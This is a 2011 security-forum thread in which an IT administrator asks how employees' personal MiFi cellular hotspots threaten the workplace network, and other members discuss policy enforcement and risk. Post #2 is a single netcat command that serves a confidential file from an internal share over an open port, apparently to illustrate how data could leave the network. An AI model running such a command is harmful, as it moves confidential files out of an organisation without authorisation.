-
January 13th, 2011, 08:10 PM
#1
Wireless in the Workplace
Hi guys and gals, I need a little help.
We recently purchased and installed a wifi security product called HiPath Wireless Manager, which is currently owned by Entarasys. Basically, using sensors scattered around the buildings where I work, it detects signals from WiFi devices and tries to triangulate their positions on maps we've put in HiPath's locations database. It also has the capability to block communications between devices, such as between an authorized client and a rogue access point. It's a pretty decent product; it needs a little work, but it'll do.
That's not the problem.
Lately, users have been bringing in these MiFi devices--WiFi routers which connect to a cellular network, for those who don't know. Some of these run off batteries, and are about half the size and twice the thickness of a credit card. Our Internet security policy states that you are not allowed to have any device connected to our internal network and another network simultaneously. It also states that no non-corporate-owned or managed device can connect to our internal network. These MiFi devices don't allow people to connect to our internal network; they simply allow them to connect straight to the internet.
My boss is wondering why I'm worried about these MiFi devices, and I keep telling her that although we can see the MiFi devices, we are unable to see whether or not whatever's associated with these devices (laptop, etc) is connected to our internal network via ethernet without chasing down each signal, and physically looking in the cubicles to see whether or not their laptops are connected to the networks. Also, these employees could be wasting time surfing the net without the fear of being logged. The boss says that's more of a productivity problem, and not a security problem.
So, can someone give me a case that these MiFi devices are not only bad for productivity, but also from a security standpoint?
-
January 13th, 2011, 08:33 PM
#2
nc -lv 1234 < \\server\share$\supersecret.doc
\"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"
-HST
-
January 13th, 2011, 09:20 PM
#3
Originally Posted by NukEvil
So, can someone give me a case that these MiFi devices are not only bad for productivity, but also from a security standpoint?
Depending on the security settings of each station/laptop/whatever the MiFi is connected to, it could be an open hole to the machines it connects with and the internal network.
Apart from that.... you say your security policy doesnt allow this? Then why is it possible from a technical point of view to work? Cant you lock down the company's computers? We would need much more info on your network and hardware and OS involved in the whole thing.
I dont know what systems you are using, but on the PCs and laptops i administer, the user can not connect to any wifi that is not set in the config files, he can not install any other wifi client since he does not have access to install such, and he has no access to add any USB devices either (so not even a router/modem/MiFi with usb would work). (Thats for linux, i have no idea if that is even possible with windows).
The security policy should not ONLY state what is allowed and what not, but it should also ENFORCE what it states using technical means.
Last edited by instronics; January 13th, 2011 at 09:22 PM.
Ubuntu-: Means in African : "Im too dumb to use Slackware"
-
January 13th, 2011, 09:31 PM
#4
I should probably have mentioned that the laptops aren't company-owned, either. The employees bring both laptop and mifi device from home. And they don't connect them to the internal network; they simply want to access the internet with them.
-
January 14th, 2011, 11:47 AM
#5
Originally Posted by NukEvil
I should probably have mentioned that the laptops aren't company-owned, either. The employees bring both laptop and mifi device from home. And they don't connect them to the internal network; they simply want to access the internet with them.
Are these private laptops used for company work? Do they carry company files? Do they connect to anything company related other than using them for internet during company operating hours? Is your concern for the mifi's only for their private laptops? What does your security policy say about using private laptops?
Im sorry dude, but from what you have said so far, its still not easy to understand the 'what-is' situation, and the 'should-be' situation.
If the private laptops are not connected to the company network, and no company work is performed on the private laptops, then there is no real security risk, but it sounds rather like a productivity issue.
IF they use their private laptops for company work but cannot connect to the internal network, then how does their 'work' transfer from the company network on to the private laptops? (usb, email, ftp over the net)???? And if thats the case, then IT IS a security concern, although once again the company policy should dictate and enforce counter measures to these problems.
Cheers
Ubuntu-: Means in African : "Im too dumb to use Slackware"
-
January 14th, 2011, 02:14 PM
#6
That's the thing; we don't know if they use the laptops only for internet access or if they also do work on them. I kinda doubt they'd use them for working purposes because of the desktop computer that every occupied cubicle has.
As in my first post:
Our Internet security policy states that you are not allowed to have any device connected to our internal network and another network simultaneously. It also states that no non-corporate-owned or managed device can connect to our internal network.
It doesn't really state anything about countermeasures, other than "blah blah subject to punishment up to and including termination and possibly prosecution"...
-
January 14th, 2011, 08:58 PM
#7
Originally Posted by NukEvil
That's the thing; we don't know if they use the laptops only for internet access or if they also do work on them. I kinda doubt they'd use them for working purposes because of the desktop computer that every occupied cubicle has.
As in my first post:
Our Internet security policy states that you are not allowed to have any device connected to our internal network and another network simultaneously. It also states that no non-corporate-owned or managed device can connect to our internal network.
It doesn't really state anything about countermeasures, other than "blah blah subject to punishment up to and including termination and possibly prosecution"...
So the only 'security' breach that i see (maybe someone else can see more) is, that if a user uses a USB stick to copy files from his cubicle PC and copies them on to his laptop, the files are as safe as the user's private laptop.
In any event, if thats not the case... then its a productivity issue since they seem to need to bring in their own 'internet' to go online. I presume that using the net from the company PCs' is no fun? Locked down etc?
However.. what makes "YOU" think there is a security issue involved? Am I missing something maybe?
Cheers.
Ubuntu-: Means in African : "Im too dumb to use Slackware"
-
January 14th, 2011, 11:09 PM
#8
So, can someone give me a case that these MiFi devices are not only bad for productivity, but also from a security standpoint?
I don't understand how productivity loss isn't sufficient enough to warrant attention.
From a security standpoint, these users are introducing unmoderated internet into the workplace. If you can't guarantee that users won't connect their laptops to your internal network, then it is a security problem.
The object of war is not to die for your country but to make the other bastard die for his - George Patton
-
January 15th, 2011, 11:16 AM
#9
-
January 17th, 2011, 03:02 AM
#10
Originally Posted by nihil
I think that the authentication works on the MAC address of the attached device, but I haven't really investigated.
I do wonder if I removed the USB WiFi adapter from one machine, would it work in another; without re-authentication?
It authenticates...most of the mifi units, if not all of them are a Novatel device, commonly the 2200. I have one. You have to authenticate, unless the owner of the device turned off the protection. I think they use WEP default, but you can change it to WAP2. Virgin Mobile recently dumped a prepaid version on retailers that rides on Sprint's 3G network. $40/month for unlimited data. They did recently announce, though, that they will cap the speeds to 256k after you break the 5Gb mark for a month.
I don't think they represent any more of a risk to your network than a usb thumb drive.
About the work productivity thing. Heh, guess that depends on what school of thought you come from.
Every now and then, one of you won't annoy me.
Similar Threads
-
By DeadAddict in forum The Security Tutorials Forum
Replies: 10
Last Post: July 21st, 2008, 12:16 AM
-
By Tiger Shark in forum Wireless Security
Replies: 33
Last Post: December 2nd, 2005, 06:49 PM
-
By yanksfan in forum Other Tutorials Forum
Replies: 0
Last Post: December 11th, 2004, 05:56 AM
-
By Shrekkie in forum Other Tutorials Forum
Replies: 1
Last Post: September 2nd, 2004, 09:11 AM
-
By mmelby in forum The Security Tutorials Forum
Replies: 1
Last Post: October 23rd, 2002, 02:31 PM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|